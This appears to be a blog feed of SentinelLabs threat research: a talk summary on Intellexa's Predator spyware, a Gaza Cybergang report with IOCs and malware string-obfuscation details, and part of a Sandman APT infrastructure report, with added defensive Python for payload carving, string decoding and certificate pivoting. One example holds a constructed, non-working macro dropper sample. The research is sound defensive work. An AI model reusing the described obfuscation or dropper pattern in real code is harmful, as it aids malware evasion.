Alex Matrosov is CEO and Founder of Binarly Inc. where he builds an AI-powered platform to protect devices against emerging firmware threats. He is the author of numerous research papers and the book Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats. He is a frequently invited speaker at security conferences, such as REcon, Black Hat, Offensivecon, WOOT, DEF CON, and many others.


LABSCon Replay | Intellexa and Cytrox: From Fixer-Upper to Intel Agency Grade Spyware

By: LABScon
26 December 2023 at 17:00

In this enlightening LABScon Replay session, Vitor Ventura, senior security researcher at Cisco Talos, alongside Michael Gentile, delves into the intriguing evolution of Intellexa and Cytrox in the spyware domain.

The Developmental Saga of Intellexa and Cytrox

Mercenary spyware companies need to evolve their spyware capabilities just like software from any other commercial company. This presentation details an account and timeline of one such mercenary organization, from almost bankrupt to having fully working spyware targeting iOS and Android with a one-click zero-day exploit.

Ventura and Gentile explore the journey of Intellexa, which emerged from the amalgamation of Nexa Technologies, WiSpear, and Cytrox, focusing on Android spyware. The talk sheds light on the critical developments that marked Intellexa’s ascension as a formidable entity in the spyware industry, adept in targeting both iOS and Android platforms.

A Deep Dive into Spyware Development

Ventura and Gentile comprehensively analyze ALIEN/PREDATOR, Intellexa’s flagship spyware suite. Through a combination of code analysis and Open Source Intelligence (OSINT), they chart the evolutionary path of this advanced spyware, revealing its sophisticated capabilities.

The presentation dissects the pivotal moments in the development cycle of the ALIEN/PREDATOR spyware suite, offering the audience valuable insights into spyware research methodologies.

Analyzing the Intricacies of Spyware Components

An important part of the talk is dedicated to the technical breakdown of the spyware’s components. The presenters discuss the distinctions and similarities between the ALIEN/PREDATOR suite and the standalone PREDATOR for iOS, providing a clear understanding of the platform-specific nuances.

This session is a recommended watch for those interested in the complexities of spyware development and its broader implications in cybersecurity. Ventura and Gentile impart a thorough understanding of the nuanced world of digital espionage and the dynamic cyber threat landscape.


About the Presenters

Vitor Ventura is a Cisco Talos security researcher and manager of the EMEA and Asia Outreach team. As a researcher, he has investigated and published various articles on emerging threats. Vitor has spoken at conferences such as VirusBulletin, NorthSec, and DEF CON’s Crypto and Privacy Village, among others. Prior to that he was IBM X-Force IRIS European manager, where he was the lead responder for several high-profile organizations affected by the WannaCry and NotPetya infections.

Mike Gentile is a Senior Security Researcher at Cisco Talos.

About LABScon 2023

This presentation was featured live at LABScon 2023, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.

Gaza Cybergang | Unified Front Targeting Hamas Opposition

14 December 2023 at 13:55

Executive Summary

  • Overlaps in targeting, malware characteristics, and long-term malware evolutions post 2018 suggest that the Gaza Cybergang sub-groups have likely been consolidating, possibly involving the establishment of internal and/or external malware supply lines.
  • Gaza Cybergang has upgraded its malware arsenal with a backdoor that we track as Pierogi++, first used in 2022 and seen throughout 2023.
  • Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war.
  • SentinelLabs’ analysis reinforces the suspected ties between Gaza Cybergang and WIRTE, historically considered a distinct cluster with loose relations to the Gaza Cybergang.

Overview

Active since at least 2012, Gaza Cybergang is a suspected Hamas-aligned cluster whose operations are primarily targeting Palestinian entities and Israel, focusing on intelligence collection and espionage. Being a threat actor of interest in the context of the Israel-Hamas war, we track Gaza Cybergang as a group composed of several adjacent sub-groups observed to share victims, TTPs, and use related malware strains since 2018. These include Gaza Cybergang Group 1 (Molerats), Gaza Cybergang Group 2 (Arid Viper, Desert Falcons, APT-C-23), and Gaza Cybergang Group 3 (the group behind Operation Parliament).

The goal of this post is twofold:

  • To highlight relations between recent and historical operations, providing a new common context connecting the Gaza Cybergang sub-groups.
  • To provide recent findings and previously unreported IOCs, which add to the accumulated knowledge of the group and support further collective tracking of Gaza Cybergang activities.

In the midst of Gaza Cybergang activity spanning from late 2022 until late 2023, we observed that the group introduced a new backdoor to their malware arsenal used in targeting primarily Palestinian entities. We track this backdoor as Pierogi++. We assess that Pierogi++ is based on an older malware strain named Pierogi, first observed in 2019. We also observed consistent targeting of Palestinian entities in this time period using the group’s staple Micropsia family malware and Pierogi++.

This targeting is typical for Gaza Cybergang. These activities are likely aligned with the tensions between the Hamas and Fatah factions, whose reconciliation attempts had been stagnating before and after the outbreak of the Israel–Hamas war. At the time of writing, our visibility into Gaza Cybergang’s activities after the onset of the conflict does not point to significant changes in their intensity or characteristics.

Our analysis of recent and historical malware used in Gaza Cybergang operations highlights new relations between activities that have taken place years apart: the Big Bang campaign (2018) and Operation Bearded Barbie (2022). Further, technical indicators we observed, originating from a recently reported activity, reinforce a suspected relation between Gaza Cybergang and the lesser-known threat group WIRTE. This group has historically been considered a distinct cluster and was later associated, with low confidence, with Gaza Cybergang. This demonstrates the intertwined nature of the Gaza Cybergang cluster, making the accurate delineation between its constituents, and even between them and other suspected Middle Eastern groups, challenging.

Throughout our analysis of Gaza Cybergang activities spanning from 2018 until the present date we observed consistent malware evolution over relatively long time periods. This ranges from minor changes in the obfuscation techniques used, to adopting new development paradigms, to resurfacing old malware strains in the form of new ones (as Pierogi++ demonstrates). In addition, the observed overlaps in targeting and malware similarities across the Gaza Cybergang sub-groups after 2018 suggest that the group has likely been undergoing a consolidation process. This possibly includes the formation of an internal malware development and maintenance hub and/or streamlining supply from external vendors.

Micropsia and Pierogi++ Target Hamas Opposition

The Gaza Cybergang umbrella has continuously targeted Israeli and Palestinian entities preceding the Israel-Hamas war. We observed additional activities spanning from late 2021 to late 2023 aligned with previous research. Our visibility into these activities, and the theme and language of the used lure and decoy documents, indicate that they were primarily targeting Palestinian entities. The majority involved malware variants of the staple Micropsia family.

Among the Micropsia family malware, we observed its Delphi and Python-based variants deploying decoy documents written in Arabic and focusing on Palestinian matters, such as Palestinian cultural heritage and political events. Many of the associated C2 domain names, such as bruce-ess[.]com and wayne-lashley[.]com, reference public figures, which aligns with the known domain naming conventions of the group. To support further collective tracking of Gaza Cybergang activities, we focus at the end of the report on listing previously unreported Micropsia indicators.

Decoy document

Among the Micropsia activities we identified a backdoor that we assess is based on a malware first reported in 2020 and named Pierogi. This backdoor, which we labeled Pierogi++, is implemented in C++, and we observed its use in 2022 and over 2023. The malware is typically delivered through archive files or weaponized Office documents on Palestinian matters, written in English or Arabic.


Malicious documents distributing Pierogi++

The documents distributing Pierogi++ use macros to deploy the malware, which then typically masquerades as a Windows artifact, such as a scheduled task or a utility application. The malware implementation is embedded either in the macros or in the documents themselves, often in Base64-encoded form.

Office macro deploying Pierogi++
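
Carving such a payload out of macro source is a routine triage step. The following Python is an added example for this section, not code from the SentinelLabs report: it collapses VBA string concatenations, scans the text for long Base64 runs, and keeps only the runs that decode to a PE image (MZ header), so that an analyst can hash or further inspect the embedded executable without running the document. The macro text and the fake PE payload are constructed for the example; the layout of the real Pierogi++ macros is not shown on this page, so the concatenation style is an assumption.

```python
import base64
import binascii
import re

# Constructed fake PE header used as the embedded payload; a real dropper
# would carry a full executable here.
PAYLOAD = (b"MZ\x90\x00\x03\x00\x00\x00"
           + b"This program cannot be run in DOS mode."
           + bytes(range(48)))


def _vba_literal(data, width=48):
    """Render bytes as Base64 split across VBA line continuations."""
    b64 = base64.b64encode(data).decode()
    parts = [b64[i:i + width] for i in range(0, len(b64), width)]
    return '"' + '" & _\n           "'.join(parts) + '"'


# Constructed macro text in the style of a Base64-embedding dropper
# (assumed layout; the real Pierogi++ macros are not reproduced here).
SAMPLE_MACRO = (
    "Sub AutoOpen()\n"
    "    Dim blob As String\n"
    "    blob = " + _vba_literal(PAYLOAD) + "\n"
    "    DropAndRun blob, Environ(\"TEMP\") & \"\\svchost.exe\"\n"
    "End Sub\n"
)

# Matches `" & "` and `" & _ <newline> "` between two string literals.
_CONCAT = re.compile(r'"\s*&\s*_?\s*"')


def join_vba_strings(text):
    """Collapse VBA string concatenations so a split Base64 blob becomes one run."""
    return _CONCAT.sub("", text)


def carve_base64_payloads(text, min_len=40, magic=b"MZ"):
    """Return (offset, bytes) for every Base64 run of at least min_len
    characters that decodes to data beginning with `magic`."""
    text = join_vba_strings(text)
    run_re = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_len)
    hits = []
    for m in run_re.finditer(text):
        try:
            data = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # alphabet-looking run that is not valid Base64
        if data.startswith(magic):
            hits.append((m.start(), data))
    return hits


if __name__ == "__main__":
    for offset, data in carve_base64_payloads(SAMPLE_MACRO):
        print("payload at offset %d, %d bytes, header %r" % (offset, len(data), data[:8]))
```

The same scan works on the raw document text when the encoded implant sits in the document body rather than in the macro; lowering min_len increases false positives, and the magic check is what keeps ordinary Base64 strings (configuration, decoy content) out of the result.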

Pierogi++ executables also masquerade as politically-themed documents, with names such as “The national role of the revolutionary and national councils in confronting the plans for liquidation and Judaization”, “The situation of Palestinian refugees in Syria refugees in Syria”, and “The Ministry of State for Wall and Settlement Affairs established by the Palestinian government”.

We assess that Pierogi++ is based on the Pierogi backdoor, whose variants are implemented in Delphi and Pascal. Pierogi and Pierogi++ share similarities in code and functionalities, such as strings, reconnaissance techniques, and deployment of decoy documents, some also seen in Micropsia malware.

String indicating that no anti-virus solution has been detected: Pierogi++ (Tm9BVg== decodes to NoAV)

String indicating that no anti-virus solution has been detected: Micropsia

Further, Pierogi++ samples implement in the same order the same backdoor functionalities as Pierogi: taking screenshots, command execution, and downloading attacker-provided files.

When handling backdoor commands, some Pierogi++ samples use the strings download and screen, whereas earlier Pierogi samples used the Ukrainian strings vydalyty, Zavantazhyty, and Ekspertyza. This raised suspicions at the time of potential external involvement in Pierogi’s development. We have not observed indicators pointing to such involvement in the Pierogi++ samples we analyzed.

Pierogi++ backdoor strings

Most of the Pierogi++ C2 servers are registered at Namecheap and hosted by Stark Industries Solutions LTD, aligning with previous infrastructure management practices of the Gaza Cybergang umbrella. The backdoor uses the curl library for exchanging data with the C2 server, a technique that we do not often observe in Gaza Cybergang’s malware arsenal.

Use of the curl library

Pierogi++ represents a compelling illustration of the continuous investment in maintenance and innovation of Gaza Cybergang’s malware, likely in an attempt to enhance its capabilities and evade detection based on known malware characteristics.

From Molerats to Arid Viper And Beyond

Following the first report on the Pierogi backdoor in February 2020, late 2020 and 2021 mark the association of the backdoor and its infrastructure with Arid Viper. The Micropsia activity linked to Arid Viper, which led to the discovery of the then-new PyMicropsia malware in December 2020, includes Pierogi samples. Further historical Pierogi samples use the escanor[.]live and nicoledotson[.]icu domains for C2 purposes, which have been associated with Arid Viper in December 2020 and April 2021. The latest variant of Pierogi is Pierogi++, which we observed targeting Palestinian entities in 2022 and over 2023; this targeting is typical for Arid Viper.

Our investigations into malware used by Gaza Cybergang prior to 2022, which share capabilities, structure, and infrastructure with Pierogi, resulted in a multitude of samples implemented in Delphi, Pascal, and C++. This highlights the frequent adoption of different development paradigms by Gaza Cybergang and aligns with the observations by Facebook, which associates these variants with Arid Viper and tracks them using different names under the broader Micropsia malware family, such as Glasswire, Primewire, and fgref.

Malware attributions

In late 2020, victims targeted with Pierogi variants as part of a suspected Arid Viper operation were observed to be also infected with the then-new SharpStage and DropBook malware, an overlap assessed to strengthen the ties between the Molerats and Arid Viper Gaza Cybergang sub-groups.

Later in June 2021, the LastConn malware, which has been discovered as part of activities attributed to the TA402 cluster, was assessed with high confidence to be an updated version of SharpStage.

Based on our follow-up investigation into recent 2023 TA402 activity targeting Middle Eastern government entities, we highlight concrete overlaps in malware used by TA402 and a lesser-known threat actor named WIRTE. First disclosed in April 2019, WIRTE was initially considered to be a distinct cluster but was later associated with low confidence to the Gaza Cybergang umbrella (primarily based on the use of decoys on Palestinian matters, which are typical for the Gaza Cybergang constituent sub-groups).

WIRTE is known for using a unique custom user agent for C2 communication when staging malware, with the value of the rv field likely being an intrusion identifier. WIRTE’s stagers encapsulate C2 communication attempts in an infinite loop, separated by sleep periods of randomly generated lengths within defined lower and upper boundaries. We observe the same unique user agent format and C2 communication pattern in TA402’s .NET malware stagers.

User agent and C2 communication in 2020 WIRTE malware

User agent and C2 communication in 2022 TA402 malware

The involvement of malware artifacts previously seen only in the context of WIRTE indicates a likely relation between the TA402, WIRTE, and Gaza Cybergang clusters. This aligns with the latest TA402 attribution assessment as a cluster overlapping with Gaza Cybergang and WIRTE.

Back To The Big Bang

Operation Bearded Barbie, revealed in April 2022 and attributed with moderate-high confidence to Arid Viper, is a campaign that has been targeting Israeli individuals and officials in the law enforcement, military, and emergency services sectors. The operation highlights the BarbWire backdoor as a novel malware in Arid Viper’s arsenal.

A closer look at the implementation of the BarbWire variants observed as part of Operation Bearded Barbie reveals relations to a malware strain used as part of the 2018 Big Bang campaign, which was considered an evolution of a 2017 campaign targeting Palestinian individuals and entities. Without making a concrete attribution at the time, the campaign was loosely associated with the Gaza Cybergang, noting some links to Arid Viper in particular.

The Big Bang campaign involves the use of a C++ implant, assessed to be an upgraded version of older Micropsia variants. In addition to some similarities in execution flow and structure, we observed that the backdoors used in the Big Bang and Bearded Barbie campaigns share unique strings that report the execution status and/or indicate internal references to malware modules.

The BarbWire samples used as part of Operation Bearded Barbie are reported to implement a custom Base64 algorithm to obfuscate strings. The backdoor does not implement changes to the Base64 encoding algorithm itself, but modifies Base64 strings by adding an extra character that is removed before decoding. Decoding BarbWire strings in this way reveals exact matches between BarbWire and the backdoor observed in the Big Bang campaign.

Backdoor string matches

In contrast to BarbWire, Big Bang backdoor samples obfuscate the same strings present in BarbWire using Base64 encoding only. The malware authors have likely introduced the Base64 string modification technique in later malware development efforts (reflected in Operation Bearded Barbie), as a relatively simple but effective attempt to evade detection based on known string artifacts.

This technique also allows for quick changes of the modified Base64 strings by only changing the second character to keep evading detection over time. For example, both of the strings IZERvZXMgbm90IGV4aXN0Lg and IHERvZXMgbm90IGV4aXN0Lg Base64-decode to “ Does not exist.” once the second character is removed.
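
To make the string recovery concrete, the following Python is an added example and not code from the report: it implements the plain Base64 decoding that suffices for the Big Bang samples and the BarbWire variant that drops the inserted second character before decoding, and accepts whichever yields printable text. The inputs are strings quoted on this page (the NoAV marker Tm9BVg== from the Pierogi++ and Micropsia comparison above, and the two BarbWire encodings of “ Does not exist.”); the position of the junk character is taken from the example in the text and is parameterised so that a different position can be tried, which is an assumption about how future variants might look.

```python
import base64
import binascii
import re
import string

_B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]*$")
_PRINTABLE = set(string.printable.encode("ascii"))


def b64_lenient(s):
    """Base64-decode a string that may lack padding; None if it is not Base64."""
    core = s.strip().rstrip("=")
    if not _B64_SHAPE.match(core):
        return None
    core += "=" * (-len(core) % 4)  # re-pad to a multiple of four
    try:
        return base64.b64decode(core)
    except (binascii.Error, ValueError):
        return None  # e.g. a length that no Base64 string can have


def decode_bigbang(s):
    """Big Bang backdoor strings: plain Base64."""
    return b64_lenient(s)


def decode_barbwire(s, junk_index=1):
    """BarbWire strings: plain Base64 with one junk character inserted at
    junk_index (the second character in the samples described above)."""
    if len(s) <= junk_index:
        return None
    return b64_lenient(s[:junk_index] + s[junk_index + 1:])


def decode_backdoor_string(s):
    """Try plain Base64 first, then the BarbWire variant, and accept the first
    candidate whose plaintext is printable ASCII. Returns (scheme, plaintext)."""
    for scheme, decoder in (("base64", decode_bigbang),
                            ("base64+junk@1", decode_barbwire)):
        out = decoder(s)
        if out and set(out) <= _PRINTABLE:
            return scheme, out
    return None, None


if __name__ == "__main__":
    # Strings quoted in the report: the NoAV marker and both BarbWire
    # encodings of " Does not exist."
    for s in ("Tm9BVg==", "IZERvZXMgbm90IGV4aXN0Lg", "IHERvZXMgbm90IGV4aXN0Lg"):
        print(s, "->", decode_backdoor_string(s))
```

The printable-text check is what makes the scheme selection safe: the junk-bearing strings still have a length that plain Base64 accepts, so they decode without error, but to bytes that no backdoor would use as a status message. Run over the string table of a sample, the function also gives an immediate hint of which of the two generations the sample belongs to.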

Conclusions

Gaza Cybergang operations over 2022 and 2023 reveal a sustained focus on targeting Palestinian entities. The discovery of the Pierogi++ backdoor shows that the group continues to evolve and supplement its staple malware arsenal, including transforming older implementations into new tooling.

The intertwined nature of its constituent sub-groups sharing TTPs, malware, and victims, indicates that Gaza Cybergang is a unified front against anti-Hamas interests. The persistent nature of the Gaza Cybergang threat underscores the necessity for sustained vigilance and cooperative measures to address the challenges posed by these threat actors.

SentinelLabs continues to monitor Gaza Cybergang activities to further improve the collective knowledge on the group’s dynamics and to supply indicators, which are relevant to security teams defending their organizations and individuals at risk of being targeted.

Indicators of Compromise

SHA-1 Hashes

003bb055758a7d687f12b65fc802bac07368335e Micropsia family malware
19026b6eb5c1c272d33bda3eab8197bec692abab Micropsia family malware
20c10d0eff2ef68b637e22472f14d87a40c3c0bd Pierogi backdoor
26fe41799f66f51247095115f9f1ff5dcc56baf8 TA402 malware staging executable (2022 version)
278565e899cb48138cc0bbc482beee39e4247a5d Pierogi backdoor
2a45843cab0241cce3541781e4e19428dcf9d949 Micropsia family malware
32d0073b8297cc8350969fd4b844d80620e2273a Document distributing Pierogi++
3ae41f7a84ca750a774f777766ccf4fd38f7725a Document distributing Pierogi++
42cb16fc35cfc30995e5c6a63e32e2f9522c2a77 Pierogi++
4dcdb7095da34b3cef73ad721d27002c5f65f47b BarbWire backdoor
5128d0af7d700241f227dd3f546b4af0ee420bbc Pierogi++
5619e476392c195ba318a5ff20e40212528729ba Micropsia family malware
599cf23db2f4d3aa3e19d28c40b3605772582cae Pierogi backdoor
5e46151df994b7b71f58556c84eeb90de0776609 Document distributing Pierogi++
5fcc262197fe8e0f129acab79fd28d32b30021d7 WIRTE PowerShell script
60480323f0e6efa3ec08282650106820b1f35d2f Archive distributing Pierogi++
694fa6436302d55c544cfb4bc9f853d3b29888ef BarbWire backdoor
708f05d39df7e47aefc4b15cb2db9f26bc9fad5f TA402 malware staging executable (2022 version)
745657b4902a451c72b4aab6cf00d05895bbc02f Micropsia family malware
75a63321938463b8416d500b34a73ce543a9d54d Pierogi++
95fc3fb692874f7415203a819543b1e0dd495a57 Micropsia family malware
994ebbe444183e0d67b13f91d75b0f9bcfb011db Operation Big Bang backdoor
aeeeee47becaa646789c5ee6df2a6e18f1d25228 Pierogi++
c3038d7b01813b365fd9c5fd98cd67053ed22371 Micropsia family malware
da96a8c04edf8c39d9f9a98381d0d549d1a887e8 Pierogi++
ee899ae5de50fdee657e04ccd65d76da7ede7c6f Operation Big Bang backdoor
f3e99ec389e6108e8fda6896fa28a4d7237995be Pierogi++

Domains

aracaravan[.]com Pierogi++ C2 server
beatricewarner[.]com Pierogi++ C2 server
bruce-ess[.]com Micropsia C2 server
claire-conway[.]com Micropsia C2 server
delooyp[.]com Micropsia C2 server
escanor[.]live Pierogi backdoor C2 server
izocraft[.]com Micropsia C2 server
jane-chapman[.]com Micropsia C2 server
lindamullins[.]info Operation Big Bang backdoor C2 server
nicoledotson[.]icu Pierogi backdoor C2 server
overingtonray[.]info Pierogi backdoor C2 server
porthopeminorhockey[.]net Micropsia C2 server
spgbotup[.]club Operation Big Bang backdoor C2 server
stgeorgebankers[.]com WIRTE C2 server
swsan-lina-soso[.]info Pierogi++ C2 server
theconomics[.]net TA402 C2 server
wanda-bell[.]website BarbWire C2 server
wayne-lashley[.]com Micropsia C2 server
zakaria-chotzen[.]info Pierogi++ C2 server

Sandman APT | China-Based Adversaries Embrace Lua

11 December 2023 at 13:55

By Aleksandar Milenkoski, Bendik Hagen (PwC), and Microsoft Threat Intelligence

Executive Summary

  • The Sandman APT is likely associated with suspected China-based threat clusters known to use the KEYPLUG backdoor, in particular a cluster jointly presented by PwC and Microsoft at LABScon 2023 – STORM-0866/Red Dev 40.
  • The Sandman’s Lua-based malware LuaDream and the KEYPLUG backdoor were observed co-existing in the same victim environments.
  • Sandman and STORM-0866/Red Dev 40 share infrastructure control and management practices, including hosting provider selections, and domain naming conventions.
  • The implementation of LuaDream and KEYPLUG reveals indicators of shared development practices and overlaps in functionalities and design, suggesting shared functional requirements by their operators.
  • The use of the Lua development paradigm in the cyberespionage domain, historically associated with actors considered Western or Western-aligned, is likely being adopted by a broader range of adversaries, including those with ties to China.

Overview

In this report, SentinelLabs, Microsoft, and PwC threat intelligence researchers provide attribution-relevant information on the Sandman APT cluster positioning this threat on the broader threat landscape. We highlight links between Sandman and a suspected China-based threat actor using the shared KEYPLUG backdoor – STORM-0866/Red Dev 40. This includes victimology overlaps, cohabitation, and sharing C2 infrastructure control and management practices.

STORM-0866/Red Dev 40 is a developing APT threat cluster primarily targeting entities in the Middle East and the South Asian subcontinent, including telecommunication providers and government entities. These are regions and sectors where we also observed Sandman activity. The modular backdoor KEYPLUG is a staple in STORM-0866/Red Dev 40’s arsenal. Mandiant first reported on KEYPLUG as part of intrusions into U.S. government entities by the Chinese APT group APT41.

Microsoft and PwC have subsequently identified at least three other developing clusters involving KEYPLUG, including STORM-0866/Red Dev 40. Their research, making the case that KEYPLUG is likely shared among multiple suspected China-based groups, was presented at LABScon 2023. They distinguish STORM-0866/Red Dev 40 from the other clusters based on specific malware characteristics, such as unique encryption keys for KEYPLUG C2 communication, and a higher sense of operational security, such as relying on Cloud-based reverse proxy infrastructure for hiding the true hosting locations of their C2 servers.

SentinelLabs and Microsoft have observed Sandman’s LuaDream and KEYPLUG implants cohabiting in the same victim environments, some of which are on the same endpoints. LuaDream is a maintained modular backdoor based on LuaJIT, with version 11.0.2.1.23.1 observed in March 2023 and version 12.0.2.5.23.29 observed in August 2023. In one instance, the KEYPLUG malware had been deployed approximately 3 months prior to LuaDream (in May 2023). LuaDream and KEYPLUG were active at the same time over approximately 2 weeks until both threats were remediated. During this time period, we did not observe any contestation or deconfliction activities by the LuaDream or KEYPLUG operators.

A close examination of the implementation and C2 infrastructure of these distinct malware strains revealed indicators of shared development as well as infrastructure control and management practices, and some overlaps in functionalities and design, suggesting shared functional requirements by their operators.

The findings we present are yet another showcase of the complex nature of the China-based threat landscape. As exemplified by Sandman and STORM-0866/Red Dev 40, this landscape is marked by substantial cooperation and coordination among its constituent threat groups, along with the possibility of third-party vendors supplying the operational teams with tooling. This makes accurate clustering challenging. Therefore, while acknowledging the association of Sandman with the suspected China-based adversaries using KEYPLUG, we continue to track Sandman as a distinct cluster until further conclusive information suggesting otherwise becomes available.

Lua-based modular backdoors, such as LuaDream, have been observed relatively rarely and often in the context of espionage-motivated APTs historically considered Western or Western-aligned. Our findings on Sandman indicate that the Lua development paradigm is being adopted by a broader set of cyberespionage threat actors for the modularity, portability, and simplicity that the Lua scripting language offers.

Sandman and STORM-0866/Red Dev 40 Infrastructure

The SSL certificate assigned to the LuaDream C2 domain ssl.explorecell[.]com has also been used on the servers with IPs of 185.51.134[.]27 (between March and April 2023) and 45.80.148[.]151 (in March 2023). 185.51.134[.]27 is allocated to the Estonian VPS service provider EstNOC and 45.80.148[.]151 to the Romanian provider HOSTGW SRL. ssl.explorecell[.]com last resolved to 185.82.218[.]230, an IP address of a server hosted in Bulgaria by the ITLDC hosting provider.

  • Thumbprint: fc8fdf58cd945619cbfede40ba06aada10de9459
  • Serial number: 364670096077097330220756280372394037039639
  • Common Name: ssl.explorecell[.]com

Approximately 4 months later (in August 2023), the server at 185.51.134[.]27 used an SSL certificate issued for the domain dan.det-ploshadka[.]com. This domain last resolved to 79.110.52[.]160, a server hosted by the Romanian service provider M247.

  • Thumbprint: a7932112b7880c95d77bc36c6fcced977f4a5889
  • Serial number: 365025056055127017786055050446086862849019
  • Common Name: dan.det-ploshadka[.]com

Microsoft and PwC have observed dan.det-ploshadka[.]com being used as a KEYPLUG C2 server and attribute the domain with high confidence to STORM-0866/Red Dev 40. This assessment is primarily based on the use of RC4 keys for encrypting C2 data that are unique to STORM-0866/Red Dev 40, as well as on the use of known STORM-0866/Red Dev 40 malware in the same intrusions.

The dan.det-ploshadka[.]com certificate has also been used on the servers with IPs 45.90.59[.]17 (between July and September 2023), 45.129.199[.]122 (in September 2023), and 146.70.157[.]20 (in June 2023).

Another certificate, issued for the domain ssl.e-novauto[.]com, was also used on 146.70.157[.]20 in May 2023. ssl.e-novauto[.]com, which has an overlap in subdomain naming convention with the ssl.explorecell[.]com Sandman domain, last resolved to 172.67.216[.]63 (an IP address of a Cloud-based reverse proxy infrastructure). 146.70.157[.]20 is allocated to the Romanian hosting service provider M247.

  • Thumbprint: b6d759c9ea5d2136bacb1b2289a31c33500c8de8
  • Serial number: 59961237898726280462746217792430024401815283068
  • Common Name: ssl.e-novauto[.]com

In common with dan.det-ploshadka[.]com, Microsoft and PwC have observed the ssl.e-novauto[.]com domain being used as a KEYPLUG C2 server and attribute the domain with high confidence to STORM-0866/Red Dev 40.

Among the other server IPs on which the ssl.e-novauto[.]com certificate was used (5.255.88[.]188 in October 2022; 5.2.67[.]176 between March and May 2023; 5.2.72[.]130 in April 2022; 37.120.140[.]205 between March 2022 and May 2023; and 185.38.142[.]129 between October 2022 and January 2023), 5.2.67[.]176 has been the resolving IP for the ssl.articella[.]com domain since January 2023. This domain has an overlap in naming convention with the ssl.e-novauto[.]com STORM-0866/Red Dev 40 domain and the ssl.explorecell[.]com Sandman domain.

Infrastructure overview

PwC tracks STORM-0866/Red Dev 40 as a distinct cluster from the other threat groups using the KEYPLUG malware based on their frequent use of Cloud-based reverse proxy infrastructure, likely as an operational security measure to avoid exposing the true hosting locations. We observed this in the context of Sandman as well, noting a shift from a directly exposed C2 server IP address (C2 domain: ssl.explorecell[.]com) to the address of a reverse proxy infrastructure (C2 domain: mode.encagil[.]com).

The overlap of unique infrastructure control and management practices, hosting provider selections, and domain naming conventions, indicates a likely relation between the Sandman and the STORM-0866/Red Dev 40 APT clusters from an infrastructure perspective.
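
Certificate pivoting of the kind walked through above can be expressed as a small graph query. The following Python is an added example for this section, not tooling from SentinelLabs, Microsoft or PwC: it records the (server IP, certificate, sighting window) observations reported above as constructed input, lists the servers that bridged two tracked certificates, and walks the shortest shared-certificate chain from the LuaDream domain to a STORM-0866/Red Dev 40 domain. Reducing each sighting to a year-month window is an assumption made for the example.

```python
from collections import defaultdict, deque

# Certificate thumbprint -> Common Name, as listed above.
FC8F = "fc8fdf58cd945619cbfede40ba06aada10de9459"
A793 = "a7932112b7880c95d77bc36c6fcced977f4a5889"
B6D7 = "b6d759c9ea5d2136bacb1b2289a31c33500c8de8"
CERT_CN = {
    FC8F: "ssl.explorecell[.]com",
    A793: "dan.det-ploshadka[.]com",
    B6D7: "ssl.e-novauto[.]com",
}

# (server IP, cert thumbprint, first seen, last seen), transcribed from the
# paragraphs above; the YYYY-MM granularity is an assumption of this example.
OBSERVATIONS = [
    ("185.51.134[.]27", FC8F, "2023-03", "2023-04"),
    ("45.80.148[.]151", FC8F, "2023-03", "2023-03"),
    ("185.51.134[.]27", A793, "2023-08", "2023-08"),
    ("45.90.59[.]17", A793, "2023-07", "2023-09"),
    ("45.129.199[.]122", A793, "2023-09", "2023-09"),
    ("146.70.157[.]20", A793, "2023-06", "2023-06"),
    ("146.70.157[.]20", B6D7, "2023-05", "2023-05"),
    ("5.255.88[.]188", B6D7, "2022-10", "2022-10"),
    ("5.2.67[.]176", B6D7, "2023-03", "2023-05"),
    ("5.2.72[.]130", B6D7, "2022-04", "2022-04"),
    ("37.120.140[.]205", B6D7, "2022-03", "2023-05"),
    ("185.38.142[.]129", B6D7, "2022-10", "2023-01"),
]


def host_graph(observations=OBSERVATIONS):
    """Bipartite adjacency between server IPs and certificate Common Names."""
    adj = defaultdict(set)
    for ip, thumb, _first, _last in observations:
        cn = CERT_CN[thumb]
        adj[ip].add(cn)
        adj[cn].add(ip)
    return adj


def bridge_hosts(observations=OBSERVATIONS):
    """IPs that served more than one tracked certificate, with the sighting
    windows in chronological order (the reuse pattern that links clusters)."""
    seen = defaultdict(list)
    for ip, thumb, first, last in observations:
        seen[ip].append((first, last, CERT_CN[thumb]))
    return {ip: sorted(v) for ip, v in seen.items()
            if len({cn for *_, cn in v}) > 1}


def pivot_path(src, dst, observations=OBSERVATIONS):
    """Shortest chain of shared-certificate links between two nodes
    (CN or IP), or None when they are not connected."""
    adj = host_graph(observations)
    prev = {src: None}
    queue = deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            path = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for nxt in sorted(adj[node]):
            if nxt not in prev:
                prev[nxt] = node
                queue.append(nxt)
    return None


def components(observations=OBSERVATIONS):
    """Connected infrastructure clusters, each a set of IPs and CNs."""
    adj = host_graph(observations)
    remaining = set(adj)
    out = []
    while remaining:
        start = remaining.pop()
        comp, stack = {start}, [start]
        while stack:
            for nxt in adj[stack.pop()]:
                if nxt not in comp:
                    comp.add(nxt)
                    stack.append(nxt)
        remaining -= comp
        out.append(comp)
    return out


if __name__ == "__main__":
    for ip, history in bridge_hosts().items():
        print(ip, history)
    print(" -> ".join(pivot_path("ssl.explorecell[.]com", "ssl.e-novauto[.]com")))
```

A bridge host on its own is weak evidence: shared hosting or a provider reassigning an address produces the same pattern, which is why the report pairs the certificate overlaps with domain naming conventions, hosting provider selections and the cohabitation observations before drawing a conclusion.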

LuaDream and KEYPLUG

LuaDream and KEYPLUG are distinct malware strains. KEYPLUG is implemented in C++, whereas the majority of the LuaDream functionalities are implemented in Lua. The samples that we analyzed do not share straightforward indicators that would confidently classify them as closely related or originating from the same source, such as use of identical encryption keys or direct overlaps in implementation. However, we observed indicators of shared development practices and some overlaps in functionalities and design, suggesting shared functional requirements by the operators. This is not uncommon in the Chinese malware landscape.

We also observed a code comment in Chinese in the main_proto_WinHttpServer component of LuaDream version 11.0.2.1.23.1, indicating potential Chinese origin. However, we note that all other LuaDream string artifacts (function and variable names, and code comment, status, and error reporting strings) are formulated in English.

Code comment in LuaDream (translates from Chinese to “returned handle”)

